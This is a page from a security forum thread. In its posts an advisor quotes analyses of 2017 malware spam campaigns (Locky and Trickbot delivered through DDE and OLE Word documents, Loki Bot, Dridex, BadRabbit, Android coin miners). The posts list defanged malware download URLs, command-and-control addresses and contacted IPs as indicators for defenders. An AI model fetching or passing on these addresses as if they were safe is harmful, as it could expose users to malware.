Page 130 of 132 FirstFirst ... 3080120126127128129130131132 LastLast
Results 1,291 to 1,300 of 1320

Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #1291
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'Office 365 update' SPAM

    FYI...

    Fake 'Office 365 update' SPAM - delivers Trojan
    - https://myonlinesecurity.co.uk/fake-...anking-trojan/
    23 Oct 2017 - "... an email with the subject of 'Office 365' pretending to come from Microsoft Security Team but actually coming via what looks like a compromised email account...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...65_cthonic.png

    office_security_update.zip: Extracts to: ms_office_update.exe - Current Virus total detections 13/67*.
    Payload Security**...
    Update: after digging around the mail server quarantine, I have found several of these, coming via numerous different -compromised- email accounts. All of them have the same malformed content with no accessible attachment... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/7...is/1508670171/
    ms_office_update.exe

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    35.189.99.49
    Contacted Hosts
    45.63.25.55
    5.9.49.12
    87.98.175.85
    141.138.157.53
    45.63.99.180
    45.32.28.232
    108.61.164.218
    45.56.117.118
    23.94.5.133
    51.255.48.78
    35.189.99.49
    144.76.133.38


    Last edited by AplusWebMaster; 2017-10-23 at 13:45.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #1292
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down 'BadRabbit' ransomware, Fake 'Invoice', 'Scan Data', 'Order acknowledgement' SPAM

    FYI...

    'BadRabbit' ransomware attacks...
    > https://www.bleepingcomputer.com/new...astern-europe/
    Oct 24, 2017 - "A new ransomware strain named 'Bad Rabbit' is wreaking havoc in many Eastern European countries, affecting both government agencies and private businesses alike. At the time of writing, the ransomware has hit countries such as Russia, Ukraine, Bulgaria, and Turkey. The speed with which Bad Rabbit spread is similar to the WannaCry and NotPetya outbreaks... ESET and Proofpoint researchers say Bad Rabbit has initially spread via -fake- Flash update packages, but the ransomware also appears to come with tools that help it move laterally inside a network, which may explain why it spread so quickly across several organizations in such a small time..."

    > https://twitter.com/hashtag/BadRabbit?src=hash

    > https://www.csoonline.com/article/32...a-outlets.html
    Oct 24, 2017

    > https://www.welivesecurity.com/2017/...er-ransomware/
    24 Oct 2017

    > https://askwoody.com/tag/badrabbit/
    Oct 24, 2017

    > https://www.virustotal.com/en/file/6...d0da/analysis/
    BadRabbit.exe.virus / Uninstaller 27.0
    49/66
    File detail: FlashUtil.exe
    Additional info:
    install_flash_player.exe
    ___

    Fake 'Invoice' SPAM - using 'DDE exploit'
    - https://myonlinesecurity.co.uk/anoth...g-dde-exploit/
    24 Oct 2017 - "Another Locky ransomware campaign using the DDE exploit[1]...
    1] https://www.bleepingcomputer.com/new...eeding-macros/
    ... the word doc contains embedded -links- that use the DDE exploit to contact a remote server & get a base64 encoded string which decodes to a set of instructions to contact a list-of-urls in turn, until one responds...
    Asking somebody to 'update links' seems innocent enough and many recipients will click 'yes':
    Update fields warning message from DDE exploit word doc:
    > https://myonlinesecurity.co.uk/wp-co...ate-fields.png
    ... many of the intermediate stages and files never get stored or kept on the victim’s computer, in fact the final Locky binary is deleted as soon as it has been run, so there are few forensic artefacts for investigation. Brad Duncan has done a Blog post at ISC explaining all this in detail[2] with examples from the earlier run.
    2] https://isc.sans.edu/forums/diary/Ne...+attack/22946/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...-DDE-email.png

    Invoice_file_921629.doc - Current Virus total detections 10/61*. Payload Security** | contacts
    ‘http ://transmercasa .com/JHGGsdsw6'
    where it downloads to memory the base64 encoded string which decodes to give these 3 urls
    http ://tatianadecastelbajac .fr/kjhgFG
    http ://video.rb-webdev .de/kjhgFG
    http ://themclarenfamily .com/kjhgFG

    This delivers heropad64.exe (VirusTotal 51/67[3]) (Payload Security[4]) which in turn sends a post request with system fingerprints to
    http ://webhotell .enivest.no/cuYT39.enc
    where if the response is acceptable it then downloads the Locky ransomware file from that site in an encrypted text format and converts it to a working .exe. 6213Lq3p.exe (VirusTotal 8/67[5]).
    It then autoruns it & deletes both the encrypted txt and the binary. It further contacts what looks like a C2 at
    http ://gdiscoun .org ...
    ... easy to protect against by changing 1 simple setting in Microsoft Word (provided your company does -not- use the DDE feature to dynamically update word files with content from Excel spreadsheets etc). See HERE for details:
    - https://myonlinesecurity.co.uk/malfo...o-viruses/#dde

    ... The Word doc has changed slightly since last week with a couple of blue star like images instead of just a few Russian characters or words:
    > https://myonlinesecurity.co.uk/wp-co...921629_doc.png

    ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/4...is/1508840890/

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    75.98.175.70
    178.216.98.139
    151.236.60.40
    62.50.190.101

    Contacted Hosts
    75.98.175.70
    151.236.60.40
    178.216.98.139
    62.50.190.101


    3] https://www.virustotal.com/en/file/3...b0f2/analysis/

    4] https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    217.175.4.4
    Contacted Hosts
    217.175.4.4

    5] https://www.virustotal.com/en/file/0...is/1508841472/
    6213Lq3p.exe
    ___

    Fake 'Scan Data' SPAM - delivers Locky via 'DDE exploit'
    - https://myonlinesecurity.co.uk/locky...victim-domain/
    24 Oct 2017 - "... Once again the word doc contains embedded links that use the 'DDE exploit' to contact a remote server & get a base64 encoded string which decodes to a set of instructions to contact a list of urls in turn, until one responds, to download a small file which in turn downloads the main Locky ransomware binary...

    ... easy to protect against by changing 1 simple setting in Microsoft Word (provided your company does not use the DDE 'feature' to dynamically update word files with content from Excel spreadsheets etc) See HERE for details:
    > https://myonlinesecurity.co.uk/malfo...o-viruses/#dde ..."
    ___

    Fake 'Order acknowledgement' SPAM - malicious attachment
    - http://blog.dynamoo.com/2017/10/malw...ement-for.html
    24 Oct 2017 - "A change to the usual -Necurs- rubbish, this -fake- order has a malformed .z archive file which contains a malicious executable with an icon to make it look-like an Office document:
    Reply-To: purchase@ animalagriculture .org
    To: Recipients [DY]
    Date: 24 October 2017 at 06:48
    Subject: FW: Order acknowledgement for BEPO/N1/380006006(2)
    Dear All,
    Kindly find the attached Purchase order# IT/IMP06/06-17 and arrange to send us the order acknowledgement by return mail.
    Note: Please expedite
    the delivery as this item is very urgently required.
    Regards, Raj Kiran
    (SUDARSHAN SS) NAVAL SYSTEMS (S&CS) ...


    Attached is a file -Purchase order comfirmation.doc.z- which contains a malicious executable 'Purchase order comfirmation.exe' which currently has a detection rate of 12/66*. It looks like the archive type does -not- actually match the extension:
    > https://3.bp.blogspot.com/-fAXTqMJsH...7zip-error.png
    If the intended target -hides- file extensions then it is easy to see how they could be fooled:
    > https://2.bp.blogspot.com/-rrnVYS9MZ...s/s1600/po.png
    ... VirusTotal shows this information about the file**...
    The Hybrid Analysis*** for is a little interesting (seemingly identifying it as Loki Bot), showing the malware phoning home to:
    jerry.eft-dongle .ir/njet/five/fre.php (188.165.162.201 / Mizban Web Paytakht Co. Ltd., Iran)
    > https://www.virustotal.com/en/ip-add...1/information/
    ... RIPE show them as being in Tehran:
    > https://www.ripe.net/membership/indi...ta/ir.mwp.html
    ... if you are -not- interested in sending traffic to Iran, Mizban Web Paytakht own AS64428 which comprises of 185.165.40.0/22 as well. I'll make a guess that the 188.165.162.200/29 range may be -insecure- and could be worth blocking... You probably -don't- need to accept .z attachments at your mail perimeter, and any decent anti-spam tool should be able to look inside archives to determine was is in there."
    * https://www.virustotal.com/en/file/8...010f/analysis/
    Purchase order comfirmation.exe

    ** File detail: SysInv2.exe

    *** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    188.165.162.201
    Contacted Hosts
    188.165.162.201

    Last edited by AplusWebMaster; 2017-10-25 at 14:49.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  3. #1293
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'Quotation', 'Payment slip', 'Payment Advice', 'Sage invoice' SPAM

    FYI...

    Fake 'Quotation' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/fake-...ivers-malware/
    25 Oct 2017 - "... an email with the subject of 'Re: Quotation' pretending to come from SNG Equipment <sales@ sngequipment .com> (in previous similar emails, the sender & companies mentioned in the email body were fairly random). I am not entirely sure what malware this is. Indications are it could be Lokibot... This file has an icon that makes it look like it is an Excel spreadsheet. Unless you have “show known file extensions enabled“, it can easily be mistaken for a genuine XLS spreadsheet instead of the .EXE file it really is, so making it much more likely for you to accidentally open it and be infected...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...tion-email.png

    Quotation.zip: Extracts to: Quotation.exe - Current Virus total detections 12/65*. Payload Security** ...
    The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/2...is/1508905407/
    Quotation.exe

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    ___

    Fake 'Payment slip' SPAM - delivers Java Trojan
    - https://myonlinesecurity.co.uk/fake-...s-java-trojan/
    25 Oct 2017 - "... emails containing java Adwind, Java Jacksbot or other Java backdoor or Remote Access Trojans. We see these sort of emails frequently. Today’s has a slightly different subject and email content to many of the previous ones. This has a link-to-download-the-java-file rather than an attachment containing the malware...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...-Slip-Copy.png

    The -link- hidden behind the image goes to
    http ://www.system.air-alicante .eu/lib/css/Payment508879883.jar (519kb)
    Current Virus total detections 1/62*. Payload Security**... system.air-alicante .eu looks to be a compromised Virtual Airline Site that appears to have been abandoned by its owner after a server crash. It was registered by Godaddy in July 2016 to a German Registrant. Currently hosted on 206.214.223.170 ServInt AS25847 which appears to be “owned” by a reseller fivedev .net who doesn’t have any abuse or contact details... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/4...is/1508882800/

    ** https://www.hybrid-analysis.com/samp...ironmentId=100

    system.air-alicante .eu: 206.214.223.170: https://www.virustotal.com/en/ip-add...0/information/
    > https://www.virustotal.com/en/url/7c...49ee/analysis/
    ___

    Fake 'Payment Advice' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/fake-...ivers-malware/
    25 Oct 2017 - "... an email with the subject of 'RE: Payment Advice 2000076579' (probably random numbers, although both copies I received have the same numbers) pretending to come from OFFICE <office@ transferdept .com>. with an ACE file attachment (ACE files are a lesser known form of zip file that needs special programs to unzip them. A high proportion of recipients will -not- have this software on their commuter)... no idea what malware this actually is, although it is quite well detected on Virus Total as a generic malware.... As far as I can determine transferdept .com is a domain that is up for sale and has no website etc associated with it...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...2000076579.png

    PAYMENT.ace (VirusTotal 10/59*): Extracts to: PAYMENT.exe Current Virus total detections 28/67**.
    Payload Security[3]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/2...is/1508921444/

    ** https://www.virustotal.com/en/file/e...is/1508933216/
    PAYMENT.exe

    3] https://www.hybrid-analysis.com/samp...ironmentId=100
    Contacted Hosts
    216.58.209.238

    transferdept .com: A temporary error occurred during the lookup...
    ___

    Fake 'Sage invoice' SPAM - delivers Dridex
    - https://myonlinesecurity.co.uk/fake-...anking-trojan/
    25 Oct 2017 - "... an email with the subject of 'Your Sage subscription invoice is ready' pretending to come from Sage which delivers Dridex banking trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...ady_-email.png

    ... The link-in-the-email goes to a -compromised- or fraudulently set up OneDrive for business/ SharePoint site where a zip file containing a .js file is downloaded. That eventually downloads the Dridex banking Trojan:
    https ://tailoredpackaging-my.sharepoint .com/personal/bec_tailoredpackaging_com_au/_layouts/15/guestaccess.aspx?docid=0b5a1a2799b6e419daf97f646640e195b&authkey=AduyYkbo5mf9IESLsGPE6yk

    Sage subscription invoice.zip: Extracts to: Sage subscription invoice.js Current Virus total detections 2/59*
    Payload Security** | Dridex Payload VirusTotal 13/67[3]| Payload Security[4]... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/d...is/1508929523/
    Sage subscription invoice.js.bin

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    104.146.164.67
    Contacted Hosts
    199.21.115.94
    162.243.137.50
    173.214.174.107
    104.236.49.165


    3] https://www.virustotal.com/en/file/f...is/1508933673/
    mvrdcoqbki2.exe

    4] https://www.hybrid-analysis.com/samp...ironmentId=100
    Contacted Hosts
    199.21.115.94
    162.243.137.50
    173.214.174.107
    104.236.49.165


    tailoredpackaging-my.sharepoint .com: 104.146.164.27: https://www.virustotal.com/en/ip-add...7/information/

    Last edited by AplusWebMaster; 2017-10-25 at 18:48.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  4. #1294
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'TRANSFER PAYMENT ERROR', 'Invoice', 'account documents' SPAM

    FYI...

    Fake 'TRANSFER PAYMENT ERROR' SPAM - delivers malware
    - https://myonlinesecurity.co.uk/trans...ivers-malware/
    26 Oct 2017 - "... an email with the subject of 'TRANSFER PAYMENT ERROR (URGENT ATTENTION!!!)' pretending to come from OFFICE <office@ transferdept .com> with an ACE file attachment (ACE files are a lesser known form of zip file that needs special programs to unzip them. A high proportion of recipients will not have this software on their commuter). Yesterday we saw a similar malspam campaign using the same-email details spoofing transferdept .com[1]... not sure what malware this actually is, although it is quite well detected on Virus Total as a generic malware. It is most probably Fareit trojan...
    1] https://myonlinesecurity.co.uk/fake-...ivers-malware/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...TION-email.png

    PAYMENT ADVICE.ace (VirusTotal 19/59*): Extracts to: PAYMENT ADVICE.exe
    - Current Virus total detections 29/66**. Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/c...is/1509003325/

    ** https://www.virustotal.com/en/file/6...is/1509008143/
    PAYMENT ADVICE.exe

    *** https://www.hybrid-analysis.com/samp...ironmentId=100
    ___

    Fake 'Invoice' SPAM - delivers Fareit trojan
    - https://myonlinesecurity.co.uk/more-...fareit-trojan/
    26 Oct 2017 - "... an email with the subject of 'Re: Invoice' pretending to come from Sales (random names and email addresses) delivers Fareit/Pony trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...oice_email.png

    NEW INVOICE.R23 (113kb): Extracts to: NEW INVOICE .com (which is an absolutely massive 11.5MB in size)
    Current Virus total detections 14/66*. Payload Security**| tries to contact
    http ://laximdiamond .com/fta/panel/shit.exe (which gives a 404) however there is an open directory
    http ://laximdiamond .com/fta/panel/ where we see this:
    > https://myonlinesecurity.co.uk/wp-co...ximdiamond.png
    It should be noted that this file has an invalid Microsoft Digital signature that expired in 2011:
    > https://myonlinesecurity.co.uk/wp-co...-signature.png

    The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/0...daff/analysis/
    daff.exe
    Additional Information:
    File names: Madhavan.exe
    daff.exe
    NEW INVOICE .com
    Madhavan
    NEW INVOICE .com

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    45.122.138.22
    Contacted Hosts
    45.122.138.22

    laximdiamond .com: 45.122.138.22: https://www.virustotal.com/en/ip-add...2/information/
    > https://www.virustotal.com/en/url/7d...6c4d/analysis/
    ___

    Fake 'account documents' SPAM - delivers Trickbot via DDE exploit
    - https://myonlinesecurity.co.uk/fake-...e-dde-exploit/
    26 Oct 2017 - "... using the DDE exploit[1] to perform malware campaigns... today the Trickbot gang have got in the act with an email with the subject of 'Your account documents' pretending to come from Lloyds Bank but actually coming from a look-a-like domain <noreply@ lloydsbankdownload .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
    1] https://www.bleepingcomputer.com/new...eeding-macros/

    Screenshot: https://myonlinesecurity.co.uk/wp-co...ents-email.png

    > https://myonlinesecurity.co.uk/wp-co...ments_docx.png

    Documents.docx - Current Virus total detections 4/58*. Payload Security**...
    This malware docx file downloads from
    http ://preview.tastymovies .com/moviefiles/lorangosor.png which of course is -not- an image file but a renamed .exe file that gets renamed to ect.exe (VirusTotal 12/67***)
    Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services.
    lloydsbankdownload .com hosted on numerous servers and IP addresses and sending the emails via 185.106.121.26 smtp3.wow-me .org | 95.211.213.219 | 185.2.81.3 | 213.152.162.231 | All of which are based in Netherlands... DO NOT follow the advice they give to enable macros or enable editing to see the content...
    The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/4...is/1509019722/
    ec4b69380c33a9fa2b0145ed0b118ef2.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    37.120.182.208
    69.12.77.100

    Contacted Hosts
    69.12.77.100
    37.120.182.208
    195.133.146.122
    194.87.235.112


    *** https://www.virustotal.com/en/file/c...5d5a/analysis/

    smtp3.wow-me .org: A temporary error occurred during the lookup...

    lloydsbankdownload .com: 95.211.213.219
    185.2.81.3
    213.152.162.231
    185.106.121.26


    tastymovies .com: 69.12.77.100: https://www.virustotal.com/en/ip-add...0/information/
    > https://www.virustotal.com/en/url/1a...7b03/analysis/
    ___

    Fake 'RBS bank line secure email' SPAM - delivers Trickbot via DDE exploit
    - https://myonlinesecurity.co.uk/fake-...a-dde-exploit/
    26 Oct 2017

    Screenshot: https://myonlinesecurity.co.uk/wp-co...cure-email.png

    > https://myonlinesecurity.co.uk/wp-co...4533._docx.png

    DO NOT follow the advice they give to enable macros or enable editing to see the content...
    The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."

    (More detail at the myonlinesecurity.co.uk URL above. )

    Last edited by AplusWebMaster; 2017-10-26 at 17:47.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  5. #1295
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'Invoice' SPAM

    FYI...

    Fake 'Invoice' SPAM - delivers Locky via word docs with embedded OLE objects
    - https://myonlinesecurity.co.uk/blank...d-ole-objects/
    31 Oct 2017 - "... another change in the Necurs botnet malspam delivery that normally delivers Locky ransomware or Trickbot banking trojan. After a week or so of using the DDE exploit, today they have switched back to embedded-OLE-objects inside a word doc... The emails pretend to be invoices with a completely empty-blank-body... The word doc contains an embedded PowerShell -script- that runs when you follow their prompts to double-click-the-image. This contacts a remote server where it opens in memory (without saving to the disc in any obvious way) a set of instructions to contact a list-of-urls in turn, until one responds, to download a small file...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...0808_email.png

    The word doc looks like:
    > https://myonlinesecurity.co.uk/wp-co...000808_doc.png

    Invoice INV0000808.doc - Current Virus total detections 5/61*. Payload Security** contacts
    http ://christakranzl .at/eiuhf384 where it downloads to memory a set of instructions that give
    these 6 urls:
    "http ://projex-dz .com/i8745fydd”,
    “http ://celebrityonline .cz/i8745fydd”,
    “http ://sigmanet .gr/i8745fydd”,
    “http ://apply.pam-innovation .com/i8745fydd”,
    “http ://bwos .be/i8745fydd”,
    “http ://zahntechnik-imlau .de/i8745fydd”
    ... Using a UK based IP number, this delivered requ4.exe which is an old well known remote admin tool Netcat. (VirusTotal 48/67[3])... using a USA based IP via a proxy, I also got requ4.exe (from the same urls) but a totally different version that looks like Locky ransomware (VirusTotal 15/66[4]) (Payload Security[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/b...is/1509442810/

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    88.198.9.176
    5.196.81.12

    Contacted Hosts
    88.198.9.176
    5.196.81.12


    3] https://www.virustotal.com/en/file/7...is/1509448777/
    nc.exe

    4] https://www.virustotal.com/en/file/d...is/1509452021/
    requ4.exe

    5] https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    77.93.62.179
    Contacted Hosts
    77.93.62.179

    5.196.81.12: https://www.virustotal.com/en/ip-add...2/information/
    > https://www.virustotal.com/en/url/4f...71de/analysis/

    88.198.9.176: https://www.virustotal.com/en/ip-add...6/information/
    > https://www.virustotal.com/en/url/c2...66b5/analysis/

    Last edited by AplusWebMaster; 2017-10-31 at 17:29.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  6. #1296
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Banking Trojan targets Google Search, 'Coin Miner' Malware - hits Google Play

    FYI...

    Banking Trojan targets Google Search Results (SEO)
    - http://blog.talosintelligence.com/20...-campaign.html
    Nov 2, 2017 - "It has become common for users to use Google to find information that they do not know. In a quick Google search you can find practically anything you need to know. Links returned by a Google search, however, are not guaranteed to be safe. In this situation, the threat actors decided to take advantage of this behavior by using Search Engine Optimization (SEO) to make their malicious links more prevalent in the search results, enabling them to target users with the Zeus-Panda-banking-Trojan. By poisoning the search results for specific banking related keywords, the attackers were able to effectively target specific users in a novel fashion. By targeting primarily financial-related keyword searches and ensuring that their -malicious- results are displayed, the attacker can attempt to maximize the conversion rate of their infections as they can be confident that infected users will be regularly using various financial platforms and thus will enable the attacker to quickly obtain credentials, banking and credit card information, etc. The overall configuration and operation of the infrastructure used to distribute this malware was interesting as it did not rely on distribution methods that Talos regularly sees being used for the distribution of malware. This is another example of how attackers regularly refine and change their techniques and illustrates why ongoing consumption of threat intelligence is essential for ensuring that organizations remain protected against new threats over time... The initial vector used to initiate this infection process does not appear to be email based. In this particular campaign, the attacker(s) targeted specific sets of search keywords that are likely to be queried by potential targets using search engines such as Google. By leveraging compromised web servers, the attacker was able to ensure that their malicious results would be ranked highly within search engines, thus increasing the likelihood that they would be clicked on by potential victims...
    Having a sound, layered, defense-in-depth strategy in place will help ensure that organizations can respond to the constantly changing threat landscape. Users, however, must also remain vigilant and think twice before clicking-a-link, opening-an-attachment or even blindly trusting the results of a Google search..."
    IPs Distributing Maldocs:
    67.195.61.46: https://www.virustotal.com/en/ip-add...6/information/
    C2 IP Addresses:
    82.146.59.228: https://www.virustotal.com/en/ip-add...8/information/
    (More detail at the talosintelligence URL above.)
    ___

    'Coin Miner' Malware - hits Google Play
    - http://blog.trendmicro.com/trendlabs...s-google-play/
    Oct 30, 2017 - "... Recently, we found that apps with -malicious- cryptocurrency mining-capabilities on Google Play. These apps used dynamic JavaScript loading and native code injection to avoid detection. We detect these apps as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER. This is not the first time we’ve found these types of apps on app stores. Several years ago, we found -malicious- apps on the Google-Play-store detected as ANDROIDOS_KAGECOIN, a malware family with hidden-cryptocurrency-mining capabilities:
    > https://www.gdatasoftware.com/blog/2...es-to-the-moon
    However, we’re now seeing apps used for this purpose, which we detect as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER. This is not the first time we’ve found these types of apps on app stores. Several years ago, we found malicious apps on the Google Play store detected as ANDROIDOS_KAGECOIN, a malware family with hidden cryptocurrency mining capabilities.*
    * https://blog.gdatasoftware.com/blog/...-the-moon.html
    ... We’ve previously seen tech support scams** -and- compromised websites used to deliver the Coinhive JavaScript cryptocurrency miner to users. However, we’re now seeing apps used for this purpose, which we detect as ANDROIDOS_JSMINER.
    ** http://blog.trendmicro.com/trendlabs...-monero-miner/
    We found two apps; one supposedly helps users pray the rosary, while the other provides discounts of various kinds:
    > https://blog.trendmicro.com/trendlab...d-mining-1.png
    ...
    > https://blog.trendmicro.com/trendlab...d-mining-2.png
    Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key... This JavaScript code runs within the app’s webview, but this is -not- visible to the user because the webview is set to run in -invisible- mode by default... Another family of malicious apps takes -legitimate-versions- of apps and adds mining libraries, which are then repackaged and distributed. We detect these as ANDROIDOS_CPUMINER. One version of this malware is in Google Play and disguised as a wallpaper application:
    > https://blog.trendmicro.com/trendlab...d-mining-5.png
    These threats highlight how even mobile devices can be used for cryptocurrency mining activities, even if, in practice, the effort results in an insignificant amount of profit. Users should take note of -any- performance degradation on their devices after installing an app. We have reached out to Google, and the apps mentioned in this post are no longer on Google Play..."

    Related posts: http://blog.trendmicro.com/trendlabs...-banking-apps/

    > http://blog.trendmicro.com/trendlabs...-monero-miner/

    > http://blog.trendmicro.com/trendlabs...r-information/

    > http://blog.trendmicro.com/trendlabs...ad-filelessly/
    "... Conclusion: Fileless attacks are becoming more common. Threat actors are increasingly using attack methods that work directly from memory and use legitimate tools or services*. In this case, WMI subscriptions have been used by this cryptocurrency-mining malware as its -fileless- persistence mechanism. Since there are no malware files on the hard drive, it’s more difficult to detect..."
    * Fileless Threats that Abuse PowerShell
    > https://www.trendmicro.com/vinfo/us/...use-powershell

    Last edited by AplusWebMaster; 2017-11-03 at 18:58.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  7. #1297
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'invoice', 'eFax' SPAM

    FYI...

    Fake 'invoice' SPAM - delivers Locky
    - https://myonlinesecurity.co.uk/fake-...ky-ransomware/
    7 Nov 2017 - "... an email with a subject of 'Invoice #231910390' (random numbers) pretending to come from XXDocumentSend at your own email address or company domain... Once again the word doc contains an embedded OLE object that when clicked on opens a PowerShell script which contacts a remote server & get a text string which contains a set of instructions to contact a list of urls in turn, until one responds, to download the main Locky ransomware or Trickbot binary...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...0390-email.png

    ... over the last couple of weeks or so the downloaders from the Necurs botnet used system fingerprinting to decide which malware to give to any victim. Certain countries and IP ranges got Locky, others got Trickbot banking trojan. I am pretty sure that these Word embedded OLE downloaders and the downloaders will also be using the same techniques:
    > https://myonlinesecurity.co.uk/wp-co...ole-object.png

    115403772_11_07_2017_14_87_41.doc - Current Virus total detections 11/60*. Payload Security** | contacts
    ‘http ://gotcaughtdui .com/693’ where it downloads to memory the text string which contains these 6 urls
    "http ://teesaddiction .com/JHgd3Dees“,
    ”http ://christaminiatures .nl/JHgd3Dees“,
    ”http ://336.linux1.testsider .dk/JHgd3Dees“,
    ”http ://florastor .net/JHgd3Dees“,
    ”http ://heinzig .info/JHgd3Dees“,
    ”http ://muchinfaket .net/p66/JHgd3Dees”
    This delivers wera4.exe (VirusTotal 10/66[3]) (Payload Security[4])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/2...is/1510048862/
    115403772_11_07_2017_14_87_41.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    132.148.21.213
    217.73.227.10

    Contacted Hosts
    132.148.21.213
    217.73.227.10


    3] https://www.virustotal.com/en/file/2...35ce/analysis/

    4] https://www.hybrid-analysis.com/samp...ironmentId=100
    ___

    Fake 'eFax' SPAM - delivers Trickbot
    - https://myonlinesecurity.co.uk/fake-...anking-trojan/
    7 Nov 2017 - "An email with the subject of 'You have a new fax' pretending to come from eFax Corporate but actually coming from a look-a-like domain <message@ efax-secure .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

    Screenshot: https://myonlinesecurity.co.uk/wp-co...-from-eFax.png

    Today’s example of the spoofed domains are, as usual, registered via Godaddy as registrar.
    efax-secure .com hosted on and sending the emails via 134.19.180.224 hosted-by .rapidrdp .com AS49453 Global Layer B.V. | 95.211.214.251 AS60781 LeaseWeb Netherlands B.V.| 185.106.121.147 free.hostsailor .com AS60117 Host Sailor Ltd. | 185.2.81.10 guish.elvb-listverify .com AS49981 WorldStream B.V. |

    HighlyEncryptedFax.doc - Current Virus total detections 3/59*. Payload Security**
    This malware file downloads from
    http ://styleof.co .uk/ser1107.png which of course is -not- an image file but a renamed .exe file that gets renamed to Hmmd.exe (VirusTotal 8/61[3]). An alternative download location is
    http ://tablet-counter .com/ser1107.png
    This email -attachment- contains a genuine word doc with a macro script that when run will infect you.
    The word doc looks like:
    > https://myonlinesecurity.co.uk/wp-co...tedFax_doc.png
    DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
    * https://www.virustotal.com/en/file/e...is/1510053544/
    HighlyEncryptedFax.doc

    ** https://www.hybrid-analysis.com/samp...ironmentId=100
    DNS Requests
    37.120.182.208
    79.171.39.110
    146.255.32.109

    Contacted Hosts
    79.171.39.110
    146.255.32.109
    37.120.182.208
    176.120.126.21
    194.87.93.48
    62.109.10.76


    3] https://www.virustotal.com/en/file/c...is/1493725297/
    Epvuyf.exe

    Last edited by AplusWebMaster; 2017-11-07 at 14:29.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  8. #1298
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Fake 'eFax' SPAM, Drive-by cryptocurrency mining

